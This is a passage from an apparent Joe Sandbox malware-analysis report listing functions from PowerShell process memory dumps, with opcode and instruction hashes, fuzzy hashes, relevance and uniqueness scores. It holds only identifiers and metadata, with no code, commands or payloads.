                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dbfade993e229cc6623cef8704d0e653697a84411eacc6eb939324974f8caa7f
                                        • Instruction ID: 6ae3b99247b486b6edf451bdc8650c76fb40ec50258bf80c0ea0aa9360890059
                                        • Opcode Fuzzy Hash: dbfade993e229cc6623cef8704d0e653697a84411eacc6eb939324974f8caa7f
                                        • Instruction Fuzzy Hash: 2BE0DF33709291174F09402D78108BA7AABC6C362130880BBE545CB256FC13AC0712A1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04C78509 Relevance: .0, Instructions: 30COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e1c7768bb10f509cc9a2a969312468b3d3d2578cb32f9c7273267a3f12b93136
                                        • Instruction ID: e736dda79cdf15c9a81d38d029e450fc78df3bfb1fd06802f10e451276c603ba
                                        • Opcode Fuzzy Hash: e1c7768bb10f509cc9a2a969312468b3d3d2578cb32f9c7273267a3f12b93136
                                        • Instruction Fuzzy Hash: 1AF0A7357087505BCF0A6B75981C1AD7BA2BFC52A5F04406ED6058B283CF78591687E6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04C7F6A0 Relevance: .0, Instructions: 30COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7106e52c0726fac5d9363d7cdd6374eed1ef2e473921168a3b6f92859de5ffd4
                                        • Instruction ID: 23caed9726efe41ab3e99613a2b8054f943228bee8509a537de148f1b30a6444
                                        • Opcode Fuzzy Hash: 7106e52c0726fac5d9363d7cdd6374eed1ef2e473921168a3b6f92859de5ffd4
                                        • Instruction Fuzzy Hash: C2E02B32B18384ABCF0445FEDCD48DDBF6ACBD9210F04407ED90553201D66124149394
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04C78CF1 Relevance: .0, Instructions: 30COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7c2c29fa9c71e0b2dd57d5252dc822956d5dd01b5cf773e77d519a4a0e1549f3
                                        • Instruction ID: 703cba48e8cd33537a5fd13d04f937500691b0a79660ea564e389b0afe32712e
                                        • Opcode Fuzzy Hash: 7c2c29fa9c71e0b2dd57d5252dc822956d5dd01b5cf773e77d519a4a0e1549f3
                                        • Instruction Fuzzy Hash: 87F0BE315047409FD721DF74C8A83AABFB1FF45314F01886AD54DCB292DB38A981CB81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04C7DBA8 Relevance: .0, Instructions: 30COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0cbe5fd3f6a400f94fe443c657771b5d21c7d7aab91e7a2404f4cfcbdb6ad843
                                        • Instruction ID: e00420c6095d7ae73c042e842e52ebbfeabd12ec66fccf06873f06a7efa475e5
                                        • Opcode Fuzzy Hash: 0cbe5fd3f6a400f94fe443c657771b5d21c7d7aab91e7a2404f4cfcbdb6ad843
                                        • Instruction Fuzzy Hash: 24E065393001118FC3008F1DD498C26BBFAEFCE76571900AAE58ACB320DA31EC01CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04C7F826 Relevance: .0, Instructions: 29COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9234f7b314ffd41031d6d7c0ad836cfae6acb4701f12c1a963756021da1ee5b4
                                        • Instruction ID: 72122b03dd547164fae1c759926fdc50c5ec5f07d2346e6de505c90735465adc
                                        • Opcode Fuzzy Hash: 9234f7b314ffd41031d6d7c0ad836cfae6acb4701f12c1a963756021da1ee5b4
                                        • Instruction Fuzzy Hash: 6BF06D79A01114EFCB04CF98E986D9DBBB2FB48315B158155F909A7361C731AD11CF41
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04C7D5EB Relevance: .0, Instructions: 27COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 72620330ae33c3be9a7eb86f308fafd732e79f63a8783a520c87c42ff57b5fa3
                                        • Instruction ID: db2a9729cd9f30a68089062c8fbc8c81b2a66c52cd5e4ddec69c0102856b3554
                                        • Opcode Fuzzy Hash: 72620330ae33c3be9a7eb86f308fafd732e79f63a8783a520c87c42ff57b5fa3
                                        • Instruction Fuzzy Hash: 74E02B31308B810FC723967C68144AEBF92DEC726034486AFE1A5D76E1CF14DD068395
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04C783A0 Relevance: .0, Instructions: 27COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 76582e7a54b8423ba8d64bb17787c1f61b84a239b5b7a5afe5f2be5327328f49
                                        • Instruction ID: d63171b7ebb368782b31fe3a1cdadc37f45d4f35cf28f8629f1d9051bd668519
                                        • Opcode Fuzzy Hash: 76582e7a54b8423ba8d64bb17787c1f61b84a239b5b7a5afe5f2be5327328f49
                                        • Instruction Fuzzy Hash: 09E0E534A042098BCB24FF6CE84B4A9BFF1BB45320B004149FA5047381D7382847DBD1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04C790D8 Relevance: .0, Instructions: 26COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bbd744830d046cf3af852a0af777f6e14d730d943490edb2f713b63cdac41171
                                        • Instruction ID: f1564f17bf7f8d53814889da7f7414a04f48f676195872fa1dd4e7acb2652232
                                        • Opcode Fuzzy Hash: bbd744830d046cf3af852a0af777f6e14d730d943490edb2f713b63cdac41171
                                        • Instruction Fuzzy Hash: DAE0DFA2B042511B621423BA48053BEA6DF8FC50E474900779E06D3242DA20EC1043E2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04C782D8 Relevance: .0, Instructions: 26COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 956d9e5db7e9e1fd3a2fc463452fc9ba749378dd7f9e3d7b2012ff627a6080a0
                                        • Instruction ID: 388f2c6c9734ec19f6fb3e8a8e19dee01c609319a8c6c0294ec73e80a7a02dc2
                                        • Opcode Fuzzy Hash: 956d9e5db7e9e1fd3a2fc463452fc9ba749378dd7f9e3d7b2012ff627a6080a0
                                        • Instruction Fuzzy Hash: 3FE09A36804A0A8BCF08BF70E41E4F9BB38FB14652B404199D70282581EA206A978AE9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04C78D00 Relevance: .0, Instructions: 25COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fcefdb066fb1cc13cd0a91d9a1b0369f2f99bf8e46c65141fc3748b9c15d10cf
                                        • Instruction ID: dc7a5145ba8271f3993f4facb4425ab7c98817b04cb23d4ba3071bab93a1d348
                                        • Opcode Fuzzy Hash: fcefdb066fb1cc13cd0a91d9a1b0369f2f99bf8e46c65141fc3748b9c15d10cf
                                        • Instruction Fuzzy Hash: 50F06D309003044FD760DF78D49C39ABBE5FB44350F00483ED24EC7280DB39A9818B90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04C78518 Relevance: .0, Instructions: 24COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0d8be6e97776f1436d64288b11bfef6693c8b973ae43cee8fd3dc07fbaba3403
                                        • Instruction ID: 7b47c8a2ad7402b5ddc0af75e8e77d4e0bb8d1fd96a2d6c7092f56cc270add7b
                                        • Opcode Fuzzy Hash: 0d8be6e97776f1436d64288b11bfef6693c8b973ae43cee8fd3dc07fbaba3403
                                        • Instruction Fuzzy Hash: EFE0DF353046105BCF092776A80C2AEBA96BBC87A4F00043ED60A83382CF78591287D9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04C7D5F8 Relevance: .0, Instructions: 23COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2ce6dcfe2c81e8ebc50ebb679ee861b3ec081e1a96c01691c963285c4b3d4398
                                        • Instruction ID: 81d1a3922e29bc2c83ca158170b080777976e1f04161d9e07c158692c80f1112
                                        • Opcode Fuzzy Hash: 2ce6dcfe2c81e8ebc50ebb679ee861b3ec081e1a96c01691c963285c4b3d4398
                                        • Instruction Fuzzy Hash: 4AE0C235344B144B8711A66EA81485FF7DBEFC56A0744843EE22AD7340DEA4ED068795
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04C790E8 Relevance: .0, Instructions: 23COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1746cb4b1a29db8375e595637f46bfca8c1cf17bc20203dfc25f3c2ea8645b1d
                                        • Instruction ID: 874adca054bde520113570e5e1bc36abc277d08918b0a9adbae8430c0cb466c4
                                        • Opcode Fuzzy Hash: 1746cb4b1a29db8375e595637f46bfca8c1cf17bc20203dfc25f3c2ea8645b1d
                                        • Instruction Fuzzy Hash: E3D05EA630022A27265432AF18097BE91CF8AC94F478D0036AB06D7641ED60EC0113F1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04C7DA48 Relevance: .0, Instructions: 23COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                        • Instruction ID: 8dff4a6eb9bca82b2b341e9123914429946dfed08556952dffebd09781c61a50
                                        • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                        • Instruction Fuzzy Hash: BBE08631B1001497CB48959AD4504D9FBAADFCC220F04C07AD90BA7340DA32691586E1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04C782E8 Relevance: .0, Instructions: 15COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d1e729b8918c38f172624e4be3beda33a26c6dabeaec1668f73b73734466a6f9
                                        • Instruction ID: a75820c18b2a728cd248657abacdb237f1cef17783debdf348bfc6aa5e40d60e
                                        • Opcode Fuzzy Hash: d1e729b8918c38f172624e4be3beda33a26c6dabeaec1668f73b73734466a6f9
                                        • Instruction Fuzzy Hash: 29D067319042098BCF08BBA5E85B4BDBB34FA18751F41816DDA0792191EF352A6ACAC5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04C783B0 Relevance: .0, Instructions: 15COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b712c96d4390b67f3f39d36b3e0bdbe86f1788ec5a6327d860c88a520978163d
                                        • Instruction ID: 130c021e5006cfab1cf31d491d0fcf21777513357d7443aa568c4b1316291371
                                        • Opcode Fuzzy Hash: b712c96d4390b67f3f39d36b3e0bdbe86f1788ec5a6327d860c88a520978163d
                                        • Instruction Fuzzy Hash: B2D01234A042098BCB04EFA8D44A46DBFB5BB48300F008159EA0593340EA345811CFC0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04C7F94F Relevance: .0, Instructions: 14COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f7e6e07fb3e204a2566a3dc5ac8263f58eca0089295bec0ec9ae17ce6f67efb6
                                        • Instruction ID: d8a160d9bdd34b2e75fb119b7ebe50de7510f8edad6667a09a34bca1e5aacbce
                                        • Opcode Fuzzy Hash: f7e6e07fb3e204a2566a3dc5ac8263f58eca0089295bec0ec9ae17ce6f67efb6
                                        • Instruction Fuzzy Hash: B9D09239B00218CFDB14CBA5E885A9CB372FF88325F108069E61997250C732A916CB40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04C7763F Relevance: .0, Instructions: 12COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3d3ae40b4a24bd90b222b84fc0a3a8a84cddc72edd9f7653926ac87d42f4d857
                                        • Instruction ID: 2150d43f0dfc5ce0a38ea84439017cdf041c445ab620e47874945e05f0d96f0e
                                        • Opcode Fuzzy Hash: 3d3ae40b4a24bd90b222b84fc0a3a8a84cddc72edd9f7653926ac87d42f4d857
                                        • Instruction Fuzzy Hash: D4D022323043C54FC30A8E80E8D02C13F209F2332871246CFD8A5AB4E3DB010A16CB20
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04C77BB1 Relevance: .0, Instructions: 9COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: eb1dbb84c1ac607d20c8e16d9cafe18929217bf009fad5e449ebea558fd644ba
                                        • Instruction ID: b1b370769499d65d5e5188eca1cb862440d000da0de2f320f5ab2a44a9a79dfd
                                        • Opcode Fuzzy Hash: eb1dbb84c1ac607d20c8e16d9cafe18929217bf009fad5e449ebea558fd644ba
                                        • Instruction Fuzzy Hash: 7BC08C319283D097EF02823440482003E61AA8322C70980CD80C047042E939C54DC302
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04C77650 Relevance: .0, Instructions: 8COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 226bb3573da7fe34459e8551b77acf6e697affc746cd0f029cfb19dd66b2a431
                                        • Instruction ID: 6cc8a2367eedc24f936591cdc2d2735772ee96d10d03ba5e15cfe030a320b608
                                        • Opcode Fuzzy Hash: 226bb3573da7fe34459e8551b77acf6e697affc746cd0f029cfb19dd66b2a431
                                        • Instruction Fuzzy Hash: 7AB09231045709CFC609AF75E408814736DFA402193A00AA8E60E4A692CE36E881CA45
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        Function 07970EB8 Relevance: 11.4, Strings: 9, Instructions: 184COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2074949142.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_7970000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: fcq$`Q^q$`Q^q$tP^q$$^q$$^q$$^q$$^q$$^q
                                        • API String ID: 0-2306644927
                                        • Opcode ID: e12a8eac0894b9efbc87b73b6fcee59eaa0ab8ada0a17cd74976254a3a25d47b
                                        • Instruction ID: cea7825e499445aebe579b7b1472dc003659f80ab264e6adff1d46b475da7cfc
                                        • Opcode Fuzzy Hash: e12a8eac0894b9efbc87b73b6fcee59eaa0ab8ada0a17cd74976254a3a25d47b
                                        • Instruction Fuzzy Hash: 1E61A1B0A5020EDFDF28CE08C545BAAB7FABF85759F148455E8019F291C771DD84CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04C7FA58 Relevance: 9.2, Strings: 7, Instructions: 455COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0oAp$0oAp$0oAp$`Q^q$$^q$$^q$$^q
                                        • API String ID: 0-1375766648
                                        • Opcode ID: bce8694cc337b8b2e7587094c1b06c6567cb6c37f83b28437b55044d748c5cad
                                        • Instruction ID: bee94aa8633cd711881429c015d9c60311b8788ff8dae57e2baae12959cdf992
                                        • Opcode Fuzzy Hash: bce8694cc337b8b2e7587094c1b06c6567cb6c37f83b28437b55044d748c5cad
                                        • Instruction Fuzzy Hash: 28E1F2307501118FDB289F3D859462E76D7AFC9B10B2448AED902CF3A5EE75ED828792
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04C77731 Relevance: 5.2, Strings: 4, Instructions: 240COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: `_q$`_q$`_q$`_q
                                        • API String ID: 0-3297199963
                                        • Opcode ID: 3179d67d3ef5324ab0f6416952f07e01f165a4dbe6cee334705b443f4e11a4e3
                                        • Instruction ID: 2e62025b5eb2c874f39b808f00129e3c24e1cadeb285c5a9488462801adc3885
                                        • Opcode Fuzzy Hash: 3179d67d3ef5324ab0f6416952f07e01f165a4dbe6cee334705b443f4e11a4e3
                                        • Instruction Fuzzy Hash: 27B1A674E012099FDB54DFA9D990A9DFBF2FF88300F10862AE419AB355DB70A945CF90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 04C77740 Relevance: 5.2, Strings: 4, Instructions: 234COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2026271815.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_4c70000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: `_q$`_q$`_q$`_q
                                        • API String ID: 0-3297199963
                                        • Opcode ID: 6d15bae565dfa39918d5b908e190437bf4c59a11b2192b352d69b2f78a16a6be
                                        • Instruction ID: 137a57fac6321ec9d710085b635bb766c5312a9f9c0d1154a93e1e4d70a5fc5c
                                        • Opcode Fuzzy Hash: 6d15bae565dfa39918d5b908e190437bf4c59a11b2192b352d69b2f78a16a6be
                                        • Instruction Fuzzy Hash: B0B19474E012099FDB54DFA9D990A9DFBF2FF88300F10862AE419AB355DB70A945CF90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 079700D2 Relevance: 5.0, Strings: 4, Instructions: 45COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.2074949142.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_7970000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'^q$4'^q$$^q$$^q
                                        • API String ID: 0-2049395529
                                        • Opcode ID: 014479e8a09a002ea0c2dc2aac9e022051ecd86e031c4ed6bb3d2517ed6dc605
                                        • Instruction ID: a375c86eeb0308f66b460bb67e40aa0511ca09cc4700eb3bc73f74e6877d0a1b
                                        • Opcode Fuzzy Hash: 014479e8a09a002ea0c2dc2aac9e022051ecd86e031c4ed6bb3d2517ed6dc605
                                        • Instruction Fuzzy Hash: 49012171B493654FC32B962C5824631BBE66FC3915F2908ABD045CF3A7CE658C8AC392
                                        Uniqueness

                                        Uniqueness Score: -1.00%